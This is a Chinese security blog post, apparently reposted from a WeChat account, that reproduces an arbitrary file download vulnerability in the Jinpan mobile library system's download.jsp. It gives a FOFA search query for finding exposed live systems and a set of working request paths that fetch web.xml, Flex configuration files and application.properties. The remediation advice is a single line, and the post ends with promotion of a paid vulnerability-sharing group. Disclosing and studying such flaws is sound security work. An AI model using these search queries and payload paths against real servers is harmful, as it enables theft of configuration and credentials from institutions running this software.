金盘移动图书馆系统 download.jsp 任意文件下载

admin 2023年10月7日22:15:49评论149 views字数 1508阅读5分1秒阅读模式

导读

 

      主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!    

金盘移动图书馆系统 download.jsp 任意文件下载

0x00免责声明
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
金盘移动图书馆系统 download.jsp 任意文件下载

0x01漏洞描述


    金盘移动图书馆系统 download.jsp 任意文件下载,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。


金盘移动图书馆系统 download.jsp 任意文件下载

0x02漏洞复现

1、fofa

body="//分词检索字段"

2、部分界面如下

金盘移动图书馆系统 download.jsp 任意文件下载

3、直接下载隐患源码文件,poc如下

/pages/admin/tools/file/download.jsp?items=/pages/admin/tools/file/download.js

金盘移动图书馆系统 download.jsp 任意文件下载

金盘移动图书馆系统 download.jsp 任意文件下载4、下载其他文件如下

/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/proxy-config.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/services-config.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/remoting-config.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/messaging-config.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/flex/data-management-config.xml/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/lcatalina.properties/pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/application.properties


金盘移动图书馆系统 download.jsp 任意文件下载

0x03修复建议


1、对下载路径进行过滤,如下载前对传入的参数进行过滤,并且对下载文件类型进行检查,是否是允许下载的类型,另外禁止使用回溯符../!


金盘移动图书馆系统 download.jsp 任意文件下载

0x04知识大陆


    因为很多未公开或者小范围公开的漏洞不能直接发公众号,所以后面部分漏洞会直接整理发表在知识大陆,持续更新,目前进入需要9.9元(收费主要是想参与freebuf知识大陆活动),链接如下:

https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2

金盘移动图书馆系统 download.jsp 任意文件下载

金盘移动图书馆系统 download.jsp 任意文件下载

加入帮会后扫描二维码加入群聊(有问题后台留言):

金盘移动图书馆系统 download.jsp 任意文件下载

金盘移动图书馆系统 download.jsp 任意文件下载

0x05往期内容


京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行

泛微 emessage 管理界面存在任意文件读取漏洞

飞企互联企业运营管理平台存在任意文件读取

泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

广联达OA存在信息泄露漏洞复现

NUUO 摄像头远程命令执行漏洞

Panabit panalog 任意用户创建漏洞和后台命令执行

用友U8 slbmbygr.jsp 存在sql注入

用友移动系统管理存在前台SQL注入漏洞

原文始发于微信公众号(五六七安全团队):金盘移动图书馆系统 download.jsp 任意文件下载

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月7日22:15:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金盘移动图书馆系统 download.jsp 任意文件下载http://cn-sec.com/archives/2090983.html

发表评论

匿名网友 填写信息